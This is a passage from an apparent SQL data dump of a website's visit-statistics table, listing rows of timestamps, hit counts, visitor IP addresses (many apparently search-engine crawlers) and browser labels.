e'),(297074,1535717449,14,14,0,0,'207.46.13.4','other'),(297075,1535717735,1,1,0,0,'37.9.113.182','other'),(297076,1535717754,1,1,0,0,'180.76.15.146','other'),(297077,1535717757,1,1,0,0,'37.53.228.75','chrome'),(297078,1535718022,1,1,0,0,'91.196.178.184','firefox'),(297079,1535718694,1,1,0,0,'66.249.66.61','chrome'),(297080,1535719058,1,1,0,0,'95.163.255.169','other'),(297081,1535719848,1,1,0,0,'91.196.177.46','firefox'),(297082,1535720015,1,1,0,0,'95.163.255.185','other'),(297083,1535720017,1,1,0,0,'8.29.198.26','other'),(297084,1535720197,1,1,0,0,'95.163.255.182','other'),(297085,1535720735,2,2,0,0,'216.244.66.241','other'),(297086,1535721339,1,1,0,0,'141.8.142.74','other'),(297087,1535721798,2,2,0,0,'54.165.59.7','other'),(297088,1535722916,1,1,0,0,'54.165.59.7','other'),(297089,1535723717,1,1,0,0,'95.163.255.168','other'),(297090,1535723764,1,1,0,0,'141.8.142.74','other'),(297091,1535723835,1,1,0,0,'54.165.59.7','other'),(297092,1535723847,1,1,0,0,'78.137.4.182','chrome'),(297093,1535724469,1,1,0,0,'66.249.66.59','chrome'),(297094,1535725109,1,1,0,0,'141.8.142.74','other'),(297095,1535726027,2,2,0,0,'176.9.25.107','other'),(297096,1535726345,1,0,1,0,'66.249.66.61',''),(297097,1535726612,1,1,0,0,'185.191.204.13','chrome'),(297098,1535728086,1,1,0,0,'207.46.13.247','other'),(297099,1535728151,1,1,0,0,'216.244.66.241','other'),(297100,1535729241,1,1,0,0,'180.76.15.154','other'),(297101,1535729460,1,0,1,0,'66.249.66.156',''),(297102,1535729724,1,1,0,0,'66.249.66.57','chrome'),(297103,1535729854,1,1,0,0,'46.211.4.24','other'),(297104,1535730110,1,1,0,0,'178.154.171.88','other'),(297105,1535730113,1,1,0,0,'141.8.142.74','other'),(297106,1535730575,1,1,0,0,'216.244.66.241','other'),(297107,1535730899,1,1,0,0,'8.29.198.27','other'),(297108,1535731421,1,1,0,0,'188.230.43.254','other'),(297109,1535731504,1,1,0,0,'95.163.255.102','other'),(297110,1535731512,2,2,0,0,'95.163.255.113','other'),(297111,1535731527,1,1,0,0,'95.163.255.116','other'),(297112,1535733816,1,1,0,0,'188.230.43.254','other'),(297113,1535734375,1,1,0,0,'141.8.142.74','other'),(297114,1535734661,1,1,0,0,'40.77.167.52','other'),(297115,1535735402,1,1,0,0,'92.113.189.235','chrome'),(297116,1535735649,1,1,0,0,'141.8.142.74','other'),(297117,1535735793,2,2,0,0,'216.244.66.241','other'),(297118,1535735835,1,0,1,0,'66.249.66.155',''),(297119,1535735901,1,0,1,0,'66.249.66.61',''),(297120,1535735905,1,1,0,0,'188.230.43.254','other'),(297121,1535736084,1,1,0,0,'66.249.66.61','chrome'),(297122,1535736637,1,1,0,0,'95.163.255.156','other'),(297123,1535736944,1,1,0,0,'91.196.178.65','firefox'),(297124,1535738026,1,1,0,0,'188.230.43.254','other'),(297125,1535738817,1,0,1,0,'66.249.66.57',''),(297126,1535740787,1,1,0,0,'141.8.142.74','other'),(297127,1535741760,1,1,0,0,'8.29.198.25','other'),(297128,1535741788,1,1,0,0,'178.154.171.88','other'),(297129,1535742223,1,1,0,0,'141.8.142.74','other'),(297130,1535742477,1,1,0,0,'95.163.255.150','other'),(297131,1535743193,1,1,0,0,'46.211.158.121','chrome'),(297132,1535743584,1,0,1,0,'66.249.66.156',''),(297133,1535743787,1,0,1,0,'66.249.66.57',''),(297134,1535743793,1,1,0,0,'141.8.142.74','other'),(297135,1535743799,1,1,0,0,'66.249.66.59','chrome'),(297136,1535746274,2,2,0,0,'216.244.66.241','other'),(297137,1535746372,1,1,0,0,'91.196.178.170','chrome'),(297138,1535748218,1,1,0,0,'141.8.142.74','other'),(297139,1535748622,1,1,0,0,'216.244.66.241','other'),(297140,1535749179,1,1,0,0,'40.77.167.52','other'),(297141,1535749707,1,1,0,0,'66.249.66.155','chrome'),(297142,1535749868,1,1,0,0,'141.8.142.74','other'),(297143,1535751700,1,0,1,0,'66.249.66.155',''),(297144,1535751841,1,0,1,0,'66.249.66.59',''),(297145,1535751846,1,1,0,0,'66.249.66.57','chrome'),(297146,1535751880,1,1,0,0,'141.8.142.74','other'),(297147,1535751881,1,1,0,0,'178.154.171.88','other'),(297148,1535752050,1,0,1,0,'66.249.66.157',''),(297149,1535752648,1,1,0,0,'8.29.198.27','other'),(297150,1535752919,1,1,0,0,'40.77.167.52','other'),(297151,1535753319,17,17,0,0,'85.10.199.185','other'),(297152,1535753474,1,1,0,0,'178.154.171.88','other'),(297153,1535753572,1,0,1,0,'66.249.66.157',''),(297154,1535756391,1,0,1,0,'66.249.66.61',''),(297155,1535756898,1,1,0,0,'40.77.167.52','other'),(297156,1535757969,1,1,0,0,'141.8.142.74','other'),(297157,1535758205,1,1,0,0,'95.27.46.101','msie'),(297158,1535758950,1,0,1,0,'66.249.66.157',''),(297159,1535759329,1,1,0,0,'216.244.66.241','other'),(297160,1535759879,2,0,2,0,'66.249.66.157',''),(297161,1535760034,1,1,0,0,'141.8.142.74','other'),(297162,1535760298,1,1,0,0,'66.249.66.157','chrome'),(297163,1535760456,2,1,1,0,'66.249.66.61',''),(297164,1535761979,1,1,0,0,'141.8.142.74','other'),(297165,1535761980,1,1,0,0,'178.154.171.88','other'),(297166,1535763509,1,1,0,0,'8.29.198.27','other'),(297167,1535764036,1,0,1,0,'66.249.66.155',''),(297168,1535764624,1,1,0,0,'216.244.66.241','other'),(297169,1535765221,1,1,0,0,'95.163.255.95','other'),(297170,1535767125,2,1,1,0,'66.249.66.155',''),(297171,1535767127,1,1,0,0,'66.249.66.57','chrome'),(297172,1535767130,1,0,1,0,'66.249.66.61',''),(297173,1535767566,1,1,0,0,'35.162.70.167','chrome'),(297174,1535767672,1,1,0,0,'40.77.167.162','other'),(297175,1535767745,1,1,0,0,'5.188.210.51','chrome'),(297176,1535767855,36,36,0,0,'144.76.71.176','other'),(297177,1535768189,1,0,1,0,'66.249.66.157',''),(297178,1535768304,1,0,1,0,'66.249.66.155',''),(297179,1535771608,1,1,0,0,'40.77.167.52','other'),(297180,1535771667,1,1,0,0,'180.76.15.147','other'),(297181,1535772280,1,1,0,0,'66.249.66.157','chrome'),(297182,1535772283,1,0,1,0,'66.249.66.57',''),(297183,1535772288,1,1,0,0,'66.249.66.57','chrome'),(297184,1535772740,8,8,0,0,'69.30.226.234','other'),(297185,1535772987,2,2,0,0,'95.216.20.84','other'),(297186,1535773618,1,1,0,0,'216.244.66.241','other'),(297187,1535774361,1,1,0,0,'8.29.198.26','other'),(297188,1535774820,1,1,0,0,'141.8.142.74','other'),(297189,1535774925,1,1,0,0,'95.163.255.92','other'),(297190,1535775387,3,0,3,0,'66.249.66.156',''),(297191,1535775772,1,1,0,0,'216.244.66.241','other'),(297192,1535777364,1,1,0,0,'66.249.66.156','chrome'),(297193,1535777387,1,0,1,0,'66.249.66.59',''),(297194,1535777393,1,1,0,0,'66.249.66.59','chrome'),(297195,1535778587,2,2,0,0,'162.210.196.130','other'),(297196,1535779220,1,0,1,0,'66.249.66.157',''),(297197,1535780719,1,0,1,0,'66.249.66.61',''),(297198,1535780726,1,0,1,0,'66.249.66.155',''),(297199,1535781171,1,1,0,0,'40.77.167.52','other'),(297200,1535782165,1,1,0,0,'91.209.11.236','other'),(297201,1535782948,1,1,0,0,'66.249.66.157','chrome'),(297202,1535782955,2,1,1,0,'66.249.66.61',''),(297203,1535783427,1,1,0,0,'91.209.11.236','other'),(297204,1535784261,1,1,0,0,'157.55.39.180','other'),(297205,1535784363,1,0,1,0,'66.249.66.155',''),(297206,1535784416,1,0,1,0,'66.249.66.156',''),(297207,1535785110,1,1,0,0,'141.8.142.74','other'),(297208,1535785206,1,1,0,0,'8.29.198.27','other'),(297209,1535787663,1,1,0,0,'141.8.142.74','other'),(297210,1535788595,1,0,1,0,'66.249.66.155',''),(297211,1535789667,1,1,0,0,'66.249.66.57','chrome'),(297212,1535790005,1,1,0,0,'178.154.171.88','other'),(297213,1535791195,2,2,0,0,'141.8.142.74','other'),(297214,1535791442,2,1,1,0,'66.249.66.155',''),(297215,1535791444,1,0,1,0,'66.249.66.59',''),(297216,1535791590,1,1,0,0,'157.55.39.180','other'),(297217,1535791803,1,1,0,0,'95.163.255.93','other'),(297218,1535791842,1,0,1,0,'66.249.66.156',''),(297219,1535792583,1,1,0,0,'91.196.177.46','chrome'),(297220,1535793269,1,0,1,0,'66.249.66.157',''),(297221,1535793649,1,0,1,0,'66.249.66.155',''),(297222,1535793949,1,1,0,0,'216.244.66.241','other'),(297223,1535795317,1,1,0,0,'78.24.217.78','chrome'),(297224,1535795319,1,1,0,0,'66.249.66.61','chrome'),(297225,1535795869,1,1,0,0,'141.8.142.74','other'),(297226,1535796056,1,1,0,0,'8.29.198.27','other'),(297227,1535796139,1,1,0,0,'209.58.178.49','other'),(297228,1535797423,1,1,0,0,'91.196.178.84','chrome'),(297229,1535797544,2,2,0,0,'207.46.13.129','other'),(297230,1535797898,1,1,0,0,'37.9.113.101','other'),(297231,1535798689,1,0,1,0,'66.249.66.157',''),(297232,1535798757,1,0,1,0,'66.249.66.156',''),(297233,1535798865,1,1,0,0,'66.249.66.156','chrome'),(297234,1535798867,1,0,1,0,'66.249.66.61',''),(297235,1535799940,1,1,0,0,'31.184.238.34','firefox'),(297236,1535800360,1,0,1,0,'66.249.66.156',''),(297237,1535800931,1,1,0,0,'66.249.66.61','chrome'),(297238,1535801803,1,1,0,0,'178.92.75.189','chrome'),(297239,1535801919,1,1,0,0,'40.77.167.52','other'),(297240,1535802380,1,1,0,0,'35.163.93.243','chrome'),(297241,1535802395,3,3,0,0,'216.244.66.241','other'),(297242,1535802623,1,0,1,0,'66.249.66.157',''),(297243,1535802989,1,1,0,0,'141.8.142.74','other'),(297244,1535804855,2,2,0,0,'40.77.167.52','other'),(297245,1535806907,1,1,0,0,'8.29.198.26','other'),(297246,1535807041,1,1,0,0,'141.8.142.74','other'),(297247,1535808974,1,1,0,0,'95.163.255.98','other'),(297248,1535809466,2,2,0,0,'178.154.171.88','other'),(297249,1535809882,1,1,0,0,'141.8.142.74','other'),(297250,1535809994,1,1,0,0,'66.249.66.157','chrome'),(297251,1535810002,1,0,1,0,'66.249.66.59',''),(297252,1535810119,1,1,0,0,'66.249.66.61','chrome'),(297253,1535810284,1,0,1,0,'66.249.66.155',''),(297254,1535811021,1,1,0,0,'141.8.142.74','other'),(297255,1535811811,1,0,1,0,'66.249.66.156',''),(297256,1535813388,1,0,1,0,'66.249.66.156',''),(297257,1535813639,1,1,0,0,'178.154.171.88','other'),(297258,1535814654,1,1,0,0,'95.163.255.97','other'),(297259,1535814711,1,1,0,0,'40.77.167.52','other'),(297260,1535815205,1,0,1,0,'66.249.66.156',''),(297261,1535815259,1,1,0,0,'178.154.171.88','other'),(297262,1535815676,1,1,0,0,'66.249.66.157','chrome'),(297263,1535815681,1,0,1,0,'66.249.66.61',''),(297264,1535815714,1,1,0,0,'66.249.66.57','chrome'),(297265,1535815859,1,0,1,0,'66.249.66.155',''),(297266,1535816107,1,1,0,0,'37.9.113.115','other'),(297267,1535816720,1,1,0,0,'5.188.210.51','firefox'),(297268,1535817595,1,1,0,0,'141.8.142.74','other'),(297269,1535817761,1,1,0,0,'8.29.198.27','other'),(297270,1535818829,1,1,0,0,'66.249.66.57','chrome'),(297271,1535818969,1,1,0,0,'95.163.255.119','other'),(297272,1535818975,1,1,0,0,'95.163.255.105','other'),(297273,1535818981,1,1,0,0,'95.163.255.117','other'),(297274,1535818989,1,1,0,0,'95.163.255.109','other'),(297275,1535819264,1,1,0,0,'178.154.171.88','other'),(297276,1535820411,1,1,0,0,'178.154.171.88','other'),(297277,1535820695,2,2,0,0,'216.244.66.241','other'),(297278,1535820808,1,0,1,0,'66.249.66.59',''),(297279,1535822061,1,1,0,0,'95.163.255.97','other'),(297280,1535822260,1,1,0,0,'66.249.66.59','chrome'),(297281,1535822374,1,1,0,0,'66.249.66.157','chrome'),(297283,1535822742,1,0,1,0,'66.249.66.155',''),(297284,1535823032,1,0,1,0,'66.249.66.61',''),(297285,1535823080,1,1,0,0,'207.46.13.118','other'),(297286,1535823562,1,0,1,0,'66.249.66.156',''),(297287,1535825139,1,1,0,0,'216.244.66.241','other'),(297288,1535825428,1,1,0,0,'92.113.189.235','chrome'),(297289,1535826679,1,1,0,0,'141.8.142.74','other'),(297290,1535827664,1,0,1,0,'66.249.66.59',''),(297291,1535828173,1,0,1,0,'66.249.66.157',''),(297292,1535828339,1,1,0,0,'178.154.171.88','other'),(297293,1535828460,1,1,0,0,'87.250.224.46','other'),(297294,1535828623,1,1,0,0,'8.29.198.25','other'),(297295,1535829051,3,3,0,0,'141.8.142.74','other'),(297296,1535829150,1,1,0,0,'66.249.66.59','chrome'),(297297,1535829243,1,1,0,0,'207.46.13.118','other'),(297298,1535830037,1,1,0,0,'66.249.66.156','chrome'),(297299,1535830780,2,2,0,0,'141.8.142.74','other'),(297300,1535831039,1,1,0,0,'87.250.224.46','other'),(297301,1535831353,1,1,0,0,'40.77.167.102','other'),(297302,1535831447,1,1,0,0,'95.163.255.99','other'),(297303,1535832171,2,0,2,0,'66.249.66.156',''),(297304,1535832428,2,2,0,0,'91.196.178.103','other'),(297305,1535832474,1,0,1,0,'66.249.66.157',''),(297306,1535833306,1,0,1,0,'66.249.66.155',''),(297307,1535833386,1,0,1,0,'66.249.66.59',''),(297308,1535834794,1,1,0,0,'40.77.167.52','other'),(297309,1535835139,1,1,0,0,'66.249.66.57','chrome'),(297310,1535835574,1,0,1,0,'66.249.66.156',''),(297311,1535837169,1,1,0,0,'157.55.39.250','other'),(297312,1535837340,1,0,1,0,'66.249.66.157',''),(297313,1535837911,1,1,0,0,'87.250.224.46','other'),(297314,1535837955,1,1,0,0,'112.124.103.58','firefox'),(297315,1535837962,2,2,0,0,'141.8.142.74','other'),(297316,1535838216,1,1,0,0,'66.249.66.155','chrome'),(297317,1535839012,1,1,0,0,'95.163.255.92','other'),(297318,1535839157,1,1,0,0,'141.8.142.74','other'),(297319,1535839470,1,1,0,0,'8.29.198.25','other'),(297320,1535839685,1,1,0,0,'216.244.66.241','other'),(297321,1535841255,18,18,0,0,'40.77.167.52','other'),(297322,1535841280,7,7,0,0,'207.46.13.165','other'),(297323,1535841323,17,17,0,0,'207.46.13.31','other'),(297324,1535841474,11,11,0,0,'157.55.39.250','other'),(297325,1535841762,1,1,0,0,'37.9.113.182','other'),(297326,1535842149,1,1,0,0,'95.163.255.93','other'),(297327,1535842721,2,0,2,0,'66.249.66.57',''),(297328,1535843332,1,1,0,0,'66.249.66.57','chrome'),(297329,1535844007,1,1,0,0,'66.249.66.59','chrome'),(297330,1535844158,1,0,1,0,'66.249.66.157',''),(297331,1535844422,1,1,0,0,'13.66.139.0','other'),(297332,1535844690,1,1,0,0,'216.244.66.241','other'),(297333,1535845721,1,1,0,0,'66.249.66.57','chrome'),(297334,1535846793,1,1,0,0,'66.249.66.59','chrome'),(297335,1535847504,1,1,0,0,'66.249.66.57','chrome'),(297336,1535847973,1,1,0,0,'40.77.167.141','other'),(297337,1535849232,1,1,0,0,'66.249.66.57','chrome'),(297338,1535849420,1,1,0,0,'95.163.255.96','other'),(297339,1535849790,1,1,0,0,'40.77.167.141','other'),(297340,1535849877,2,2,0,0,'178.154.171.88','other'),(297341,1535850046,1,1,0,0,'66.249.66.59','chrome'),(297342,1535850320,1,1,0,0,'8.29.198.26','other'),(297343,1535850410,1,1,0,0,'66.249.66.61','chrome'),(297344,1535850660,1,1,0,0,'52.53.201.78','chrome'),(297345,1535853341,1,1,0,0,'178.154.171.88','other'),(297346,1535853370,3,3,0,0,'141.8.142.74','other'),(297347,1535853641,1,1,0,0,'66.249.66.61','chrome'),(297348,1535854571,1,1,0,0,'66.249.66.61','chrome'),(297349,1535855226,1,1,0,0,'87.250.224.46','other'),(297350,1535855540,1,1,0,0,'52.34.24.33','chrome'),(297351,1535856003,1,1,0,0,'178.154.171.88','other'),(297352,1535858027,1,1,0,0,'185.191.204.13','chrome'),(297353,1535858697,1,1,0,0,'178.154.171.88','other'),(297354,1535858704,1,1,0,0,'178.154.200.41','other'),(297355,1535858895,2,1,1,0,'66.249.66.57',''),(297356,1535859146,1,0,1,0,'66.249.66.157',''),(297357,1535859651,1,1,0,0,'178.154.171.88','other'),(297358,1535859672,1,1,0,0,'141.8.142.74','other'),(297359,1535860776,2,2,0,0,'95.213.141.126','opera'),(297360,1535861113,1,1,0,0,'66.249.66.57','chrome'),(297361,1535861154,1,1,0,0,'8.29.198.26','other'),(297362,1535863877,1,1,0,0,'87.250.224.46','other'),(297363,1535864272,1,1,0,0,'66.249.66.59','chrome'),(297364,1535864400,1,1,0,0,'216.244.66.241','other'),(297365,1535865229,2,2,0,0,'66.249.66.59','chrome'),(297366,1535866756,1,1,0,0,'178.154.171.88','other'),(297367,1535866916,3,3,0,0,'216.244.66.241','other'),(297368,1535868104,1,0,1,0,'66.249.66.61',''),(297369,1535868451,1,1,0,0,'141.8.142.74','other'),(297370,1535868610,1,1,0,0,'66.249.66.61','chrome'),(297371,1535868979,1,1,0,0,'108.59.8.80','other'),(297372,1535869582,1,1,0,0,'141.8.142.74','other'),(297373,1535870059,1,1,0,0,'40.77.167.142','other'),(297374,1535870932,2,2,0,0,'66.249.66.59','chrome'),(297375,1535871062,1,1,0,0,'178.154.171.88','other'),(297376,1535871448,1,1,0,0,'5.188.210.51','firefox'),(297377,1535872003,1,1,0,0,'8.29.198.27','other'),(297378,1535872168,2,2,0,0,'91.196.178.47','chrome'),(297379,1535872220,2,2,0,0,'141.8.132.19','other'),(297380,1535872873,1,1,0,0,'66.249.66.61','chrome'),(297381,1535873030,1,1,0,0,'37.9.113.182','other'),(297382,1535873034,1,1,0,0,'37.9.113.115','other'),(297383,1535873130,1,1,0,0,'66.249.66.57','chrome'),(297384,1535873559,1,1,0,0,'207.46.13.169','other'),(297385,1535873698,1,1,0,0,'209.90.225.195','chrome'),(297386,1535873825,1,1,0,0,'141.8.132.19','other'),(297387,1535874383,1,0,1,0,'66.249.66.57',''),(297388,1535875156,2,2,0,0,'216.244.66.241','other'),(297389,1535875206,1,1,0,0,'40.77.167.141','other'),(297390,1535875932,1,1,0,0,'66.249.66.57','chrome'),(297391,1535876136,1,1,0,0,'5.166.153.146','msie'),(297392,1535876185,1,1,0,0,'178.154.171.88','other'),(297393,1535876592,1,1,0,0,'95.163.255.98','other'),(297394,1535876766,2,2,0,0,'91.196.178.47','chrome'),(297395,1535877703,1,1,0,0,'54.36.149.224','other'),(297396,1535877972,1,1,0,0,'95.163.255.96','other'),(297397,1535878145,1,1,0,0,'216.244.66.241','other'),(297398,1535878729,1,1,0,0,'66.249.66.156','chrome'),(297399,1535879174,1,1,0,0,'91.196.178.47','chrome'),(297400,1535879248,1,1,0,0,'37.52.22.139','chrome'),(297401,1535879461,1,1,0,0,'141.8.142.74','other'),(297402,1535880367,1,1,0,0,'95.163.255.95','other'),(297403,1535880850,1,1,0,0,'216.244.66.241','other'),(297404,1535881673,1,1,0,0,'66.249.66.157','chrome'),(297405,1535882111,2,2,0,0,'207.46.13.169','other'),(297406,1535882136,2,2,0,0,'37.9.113.110','other'),(297407,1535882409,2,2,0,0,'178.154.171.88','other'),(297408,1535882844,1,1,0,0,'8.29.198.26','other'),(297409,1535884070,1,1,0,0,'40.77.167.141','other'),(297410,1535884156,1,1,0,0,'66.249.66.59','chrome'),(297411,1535884424,1,1,0,0,'178.154.171.88','other'),(297412,1535884498,1,1,0,0,'95.163.255.170','other'),(297413,1535884926,2,2,0,0,'66.249.66.57','chrome'),(297414,1535885555,1,1,0,0,'66.249.66.157','chrome'),(297415,1535885752,1,1,0,0,'141.8.142.74','other'),(297416,1535885815,1,1,0,0,'213.202.254.136','opera'),(297417,1535886015,1,1,0,0,'66.249.66.59','chrome'),(297418,1535886045,1,1,0,0,'66.249.66.155','chrome'),(297419,1535886216,1,1,0,0,'95.163.255.94','other'),(297420,1535886665,1,1,0,0,'216.244.66.241','other'),(297421,1535886809,2,2,0,0,'46.39.70.53','chrome'),(297422,1535886908,1,1,0,0,'91.196.178.136','firefox'),(297423,1535887129,1,1,0,0,'66.249.66.59','chrome'),(297424,1535887947,1,0,1,0,'66.249.66.155',''),(297425,1535888016,2,2,0,0,'40.77.167.141','other'),(297426,1535888471,1,1,0,0,'141.8.142.74','other'),(297427,1535888738,1,1,0,0,'91.209.11.236','other'),(297428,1535888808,2,2,0,0,'216.244.66.241','other'),(297429,1535889899,1,1,0,0,'95.163.255.93','other'),(297430,1535890296,1,1,0,0,'92.113.189.235','chrome'),(297431,1535890454,1,0,1,0,'66.249.66.156',''),(297432,1535890620,2,2,0,0,'66.249.66.57','chrome'),(297433,1535890888,1,1,0,0,'91.196.178.47','chrome'),(297434,1535891626,1,0,1,0,'66.249.66.155',''),(297435,1535891804,2,2,0,0,'66.249.66.59','chrome'),(297436,1535892055,1,1,0,0,'216.244.66.241','other'),(297437,1535892402,1,1,0,0,'141.8.142.74','other'),(297438,1535893290,131,131,0,0,'144.76.137.254','other'),(297439,1535893530,1,1,0,0,'199.58.86.209','other'),(297440,1535893605,1,1,0,0,'188.226.170.140','chrome'),(297441,1535893682,1,1,0,0,'8.29.198.27','other'),(297442,1535894106,1,1,0,0,'141.8.142.74','other'),(297443,1535894270,1,1,0,0,'146.185.185.122','chrome'),(297444,1535895634,1,1,0,0,'87.250.224.46','other'),(297445,1535896750,1,1,0,0,'157.55.39.160','other'),(297446,1535897407,1,1,0,0,'87.250.224.46','other'),(297447,1535897410,1,1,0,0,'141.8.142.74','other'),(297448,1535897696,1,1,0,0,'216.244.66.241','other'),(297449,1535898347,1,1,0,0,'176.120.38.254','firefox'),(297450,1535899388,1,1,0,0,'91.196.178.47','chrome'),(297451,1535899390,1,1,0,0,'66.249.66.155','chrome'),(297452,1535900753,1,0,1,0,'66.249.66.59',''),(297453,1535902153,1,0,1,0,'66.249.66.61',''),(297454,1535902472,1,1,0,0,'95.163.255.181','other'),(297455,1535903062,1,1,0,0,'216.244.66.241','other'),(297456,1535904047,2,2,0,0,'40.77.167.141','other'),(297457,1535904265,1,1,0,0,'91.196.178.47','chrome'),(297458,1535904522,1,1,0,0,'8.29.198.25','other'),(297459,1535905737,9,9,0,0,'40.77.167.141','other'),(297460,1535905744,16,16,0,0,'157.55.39.160','other'),(297461,1535905760,9,9,0,0,'40.77.167.179','other'),(297462,1535905793,7,7,0,0,'40.77.167.75','other'),(297463,1535905954,1,1,0,0,'66.249.66.61','chrome'),(297464,1535906392,1,1,0,0,'182.139.150.241','other'),(297465,1535906726,1,1,0,0,'178.154.171.88','other'),(297466,1535906871,1,1,0,0,'40.77.167.179','other'),(297467,1535907025,1,1,0,0,'95.163.255.116','other'),(297468,1535907032,1,1,0,0,'95.163.255.105','other'),(297469,1535907040,1,1,0,0,'95.163.255.109','other'),(297470,1535907047,1,1,0,0,'95.163.255.117','other'),(297471,1535907140,2,2,0,0,'141.8.142.74','other'),(297472,1535909903,1,1,0,0,'92.113.189.235','chrome'),(297473,1535910948,1,0,1,0,'66.249.66.157',''),(297474,1535911237,1,1,0,0,'91.196.178.47','chrome'),(297475,1535911246,1,1,0,0,'40.77.167.141','other'),(297476,1535912075,1,1,0,0,'95.163.255.172','other'),(297477,1535912225,5,5,0,0,'178.151.245.174','other'),(297478,1535912335,2,2,0,0,'40.77.167.179','other'),(297479,1535912406,1,1,0,0,'91.196.178.57','chrome'),(297480,1535912619,1,1,0,0,'91.196.178.76','firefox'),(297481,1535912734,1,1,0,0,'157.55.39.160','other'),(297482,1535913052,1,1,0,0,'216.244.66.241','other'),(297483,1535913628,1,1,0,0,'95.163.255.180','other'),(297484,1535914270,1,1,0,0,'95.163.255.92','other'),(297485,1535914628,1,1,0,0,'178.154.171.88','other'),(297486,1535915381,1,1,0,0,'8.29.198.25','other'),(297487,1535915815,3,3,0,0,'178.154.171.88','other'),(297488,1535916432,1,1,0,0,'141.8.142.74','other'),(297489,1535917113,2,2,0,0,'89.36.213.38','firefox'),(297490,1535919523,1,1,0,0,'95.163.255.97','other'),(297491,1535920835,1,1,0,0,'178.154.171.88','other'),(297492,1535921021,1,0,1,0,'66.249.66.61',''),(297493,1535921808,1,1,0,0,'216.244.66.241','other'),(297494,1535921865,1,1,0,0,'178.154.171.88','other'),(297495,1535921890,1,1,0,0,'40.77.167.179','other'),(297496,1535923770,1,1,0,0,'45.55.53.117','other'),(297497,1535924854,1,1,0,0,'95.163.255.93','other'),(297498,1535925036,1,1,0,0,'135.23.221.142','other'),(297499,1535925039,1,1,0,0,'135.23.221.142','firefox'),(297500,1535926091,3,3,0,0,'216.244.66.241','other'),(297501,1535926263,1,1,0,0,'8.29.198.25','other'),(297502,1535926568,1,1,0,0,'141.8.142.74','other'),(297503,1535927067,1,1,0,0,'66.249.66.57','chrome'),(297504,1535928341,1,1,0,0,'141.8.142.74','other'),(297505,1535928798,1,1,0,0,'95.163.255.161','other'),(297506,1535928906,2,2,0,0,'216.244.66.241','other'),(297507,1535930284,1,1,0,0,'66.249.66.156','chrome'),(297508,1535930542,1,1,0,0,'207.46.13.36','other'),(297509,1535931477,2,2,0,0,'216.244.66.241','other'),(297510,1535931666,2,2,0,0,'141.8.142.74','other'),(297511,1535931785,1,1,0,0,'178.154.171.88','other'),(297512,1535931884,1,0,1,0,'66.249.66.59',''),(297513,1535932596,2,0,2,0,'66.249.66.155',''),(297514,1535933630,1,1,0,0,'141.8.142.74','other'),(297515,1535933835,1,1,0,0,'37.204.53.200','chrome'),(297516,1535934891,1,0,1,0,'66.249.66.155',''),(297517,1535935025,1,1,0,0,'66.249.66.157','chrome'),(297518,1535935031,2,1,1,0,'66.249.66.156',''),(297519,1535936170,2,2,0,0,'141.8.142.74','other'),(297520,1535936486,1,1,0,0,'5.188.210.51','firefox'),(297521,1535937106,1,1,0,0,'216.244.66.241','other'),(297522,1535937124,1,1,0,0,'8.29.198.26','other'),(297523,1535937581,1,1,0,0,'40.77.167.141','other'),(297524,1535937934,1,1,0,0,'141.8.142.74','other'),(297525,1535938152,1,1,0,0,'95.163.255.97','other'),(297526,1535939714,1,1,0,0,'178.154.171.88','other'),(297527,1535939843,1,1,0,0,'216.244.66.241','other'),(297528,1535940517,2,2,0,0,'188.40.102.170','other'),(297529,1535940828,1,1,0,0,'52.41.211.72','chrome'),(297530,1535942170,1,1,0,0,'216.244.66.241','other'),(297531,1535942467,4,4,0,0,'95.216.38.186','other'),(297532,1535943305,1,1,0,0,'141.8.142.74','other'),(297533,1535943439,1,1,0,0,'66.249.66.57','chrome'),(297534,1535943445,2,2,0,0,'54.165.59.7','other'),(297535,1535944920,2,2,0,0,'141.8.142.74','other'),(297536,1535944926,2,2,0,0,'216.244.66.241','other'),(297537,1535946203,1,1,0,0,'95.163.255.93','other'),(297538,1535946573,1,1,0,0,'40.77.167.141','other'),(297539,1535947575,2,2,0,0,'216.244.66.241','other'),(297540,1535947781,1,1,0,0,'178.154.171.88','other'),(297541,1535948003,1,1,0,0,'8.29.198.27','other'),(297542,1535948985,2,2,0,0,'91.196.178.74','chrome'),(297543,1535949767,1,1,0,0,'141.8.142.74','other'),(297544,1535950481,1,1,0,0,'95.163.255.177','other'),(297545,1535950783,1,1,0,0,'185.191.204.7','chrome'),(297546,1535952097,1,1,0,0,'77.93.41.218','chrome'),(297547,1535952190,1,1,0,0,'141.8.142.74','other'),(297548,1535953033,1,1,0,0,'178.154.171.88','other'),(297549,1535953593,3,3,0,0,'91.196.178.89','chrome'),(297550,1535953909,1,1,0,0,'207.46.13.112','other'),(297551,1535954816,2,2,0,0,'199.58.86.209','other'),(297552,1535954888,1,1,0,0,'66.102.9.136','chrome'),(297553,1535955880,1,1,0,0,'95.163.255.154','other'),(297554,1535956125,2,2,0,0,'95.213.141.126','opera'),(297555,1535956940,1,1,0,0,'95.132.12.37','firefox'),(297556,1535957026,1,1,0,0,'37.110.55.206','msie'),(297557,1535957687,1,1,0,0,'77.111.247.45','chrome'),(297558,1535958166,1,1,0,0,'87.250.224.46','other'),(297559,1535958170,2,2,0,0,'141.8.142.74','other'),(297560,1535958530,1,1,0,0,'178.154.171.88','other'),(297561,1535958850,1,1,0,0,'8.29.198.27','other'),(297562,1535958970,1,1,0,0,'40.77.167.123','other'),(297563,1535959004,1,1,0,0,'91.196.178.162','chrome'),(297564,1535959525,1,1,0,0,'91.196.178.89','chrome'),(297565,1535959668,1,1,0,0,'40.77.167.193','other'),(297566,1535959997,1,1,0,0,'91.196.178.175','other'),(297567,1535960053,1,0,1,0,'66.249.66.61',''),(297568,1535960075,1,1,0,0,'178.95.67.148','chrome'),(297569,1535960439,1,1,0,0,'216.244.66.241','other'),(297570,1535960664,1,1,0,0,'82.207.49.98','chrome'),(297571,1535961398,1,1,0,0,'216.244.66.241','other'),(297572,1535962498,2,2,0,0,'46.219.205.166','chrome'),(297573,1535963054,1,1,0,0,'40.77.167.129','other'),(297574,1535963955,1,1,0,0,'216.244.66.241','other'),(297575,1535963964,1,1,0,0,'91.124.182.170','firefox'),(297576,1535964858,1,1,0,0,'34.254.225.19','chrome'),(297577,1535965283,1,1,0,0,'91.124.182.170','firefox'),(297578,1535965637,1,1,0,0,'40.77.167.123','other'),(297579,1535966630,1,1,0,0,'91.124.182.170','firefox'),(297580,1535966743,1,0,1,0,'66.249.66.155',''),(297581,1535967804,1,1,0,0,'91.124.182.170','firefox'),(297582,1535967987,1,1,0,0,'95.163.255.99','other'),(297583,1535968730,1,1,0,0,'91.196.179.138','firefox'),(297584,1535968828,1,1,0,0,'91.196.178.72','firefox'),(297585,1535968857,1,1,0,0,'178.9